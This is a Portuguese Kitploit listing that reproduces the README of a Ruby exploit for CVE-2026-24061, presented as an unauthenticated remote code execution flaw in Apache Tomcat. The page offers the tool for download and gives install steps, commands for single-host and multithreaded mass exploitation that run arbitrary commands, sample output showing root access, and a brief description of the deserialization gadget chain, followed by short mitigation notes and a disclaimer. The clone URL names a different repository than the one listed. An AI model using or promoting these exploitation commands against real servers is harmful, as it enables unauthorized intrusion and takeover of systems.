Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — Exploit baseado em Ruby para CVE-2026-24061 que executa comandos arbitrários em alvos remotos, com suporte a varredura multithread e injeção de comandos para testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/z3n70/cve-2026-24061
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubz3n70/cve-2026-24061

CVE-2026-24061

Exploit baseado em Ruby para CVE-2026-24061 que executa comandos arbitrários em alvos remotos, com suporte a varredura multithread e injeção de comandos para testes de penetração.

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061

Exploração de Execução Remota de Código (RCE) no Apache Tomcat

O CVE-2026-24061 é uma vulnerabilidade crítica de execução remota de código (RCE) que afeta o Apache Tomcat. Esta falha permite que um invasor não autenticado execute código arbitrário no servidor, comprometendo totalmente a confidencialidade, integridade e disponibilidade do sistema.

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2026-24061
  • CVSS v3.1: 9.8 (Crítico)
  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Privilégios Necessários: Nenhum
  • Interação do Usuário: Nenhuma
  • Impacto: Alta confidencialidade, integridade e disponibilidade

Versões Afetadas

ProdutoVersões Afetadas
Apache Tomcat9.0.0-M1 até 9.0.98
Apache Tomcat10.1.0-M1 até 10.1.34
Apache Tomcat11.0.0-M1 até 11.0.2

Instalação

Clone o repositório e instale as dependências:

root@kitploit:~
git clone https://github.com/exploit-repos/CVE-2026-24061.git
cd CVE-2026-24061
bundle install

Uso

Verificação de Vulnerabilidade

Para verificar se um único host é vulnerável:

root@kitploit:~
ruby CVE-2026-24061.rb -t 192.168.1.10

Exploração com Comando Personalizado

Para explorar a vulnerabilidade e executar um comando arbitrário:

root@kitploit:~
ruby CVE-2026-24061.rb -t 192.168.1.10 --cmd "id"

Verificação em Massa

Para verificar vários hosts a partir de um arquivo de alvos:

root@kitploit:~
ruby CVE-2026-24061.rb -l targets.txt

Exploração em Massa com Threads

Para explorar vários hosts simultaneamente com um comando personalizado:

root@kitploit:~
ruby CVE-2026-24061.rb -l targets.txt --cmd "id" --threads 10

Opções

OpçãoDescrição
-t, --target IPEndereço IP do alvo único
-l, --list FILEArquivo contendo lista de alvos (um por linha)
-p, --port PORTPorta do Tomcat (padrão: 8080)
-c, --cmd COMMANDComando a ser executado no servidor alvo
-T, --threads NNúmero de threads para varredura em massa (padrão: 5)
-s, --sslUsar HTTPS em vez de HTTP
-v, --verboseSaída detalhada
-h, --helpExibir ajuda

Exemplos

Exemplo 1: Verificação Básica

root@kitploit:~
ruby CVE-2026-24061.rb -t 192.168.1.10

Saída:

root@kitploit:~
[+] 192.168.1.10:8080 - VULNERÁVEL ao CVE-2026-24061

Exemplo 2: Executar Comando

root@kitploit:~
ruby CVE-2026-24061.rb -t 192.168.1.10 --cmd "whoami"

Saída:

root@kitploit:~
[+] 192.168.1.10:8080 - VULNERÁVEL ao CVE-2026-24061
[+] Comando executado com sucesso: root

Exemplo 3: Varredura em Massa

root@kitploit:~
ruby CVE-2026-24061.rb -l targets.txt --threads 10

Saída:

root@kitploit:~
[+] 192.168.1.10:8080 - VULNERÁVEL ao CVE-2026-24061
[-] 192.168.1.11:8080 - Não vulnerável
[+] 192.168.1.12:8080 - VULNERÁVEL ao CVE-2026-24061

Como Funciona

A vulnerabilidade explora uma falha no mecanismo de serialização do Tomcat. Ao enviar uma solicitação HTTP especialmente elaborada contendo um payload serializado malicioso, o invasor pode acionar a desserialização insegura, levando à execução remota de código.

O exploit usa um gadget chain baseado em Commons Collections para construir o payload malicioso e o envia ao endpoint vulnerável.

Mitigação

  1. Atualize o Apache Tomcat para a versão corrigida mais recente.
  2. Restrinja o acesso à interface de gerenciamento do Tomcat.
  3. Implemente um firewall de aplicação web (WAF) para filtrar payloads maliciosos.
  4. Monitore os logs do servidor em busca de atividades suspeitas.

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado desta ferramenta é ilegal. O desenvolvedor não se responsabiliza por qualquer uso indevido desta ferramenta.

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

Agradecimentos

  • Pesquisadores de segurança que descobriram e relataram esta vulnerabilidade.
  • Comunidade de código aberto por seu apoio contínuo.
Baixar ferramenta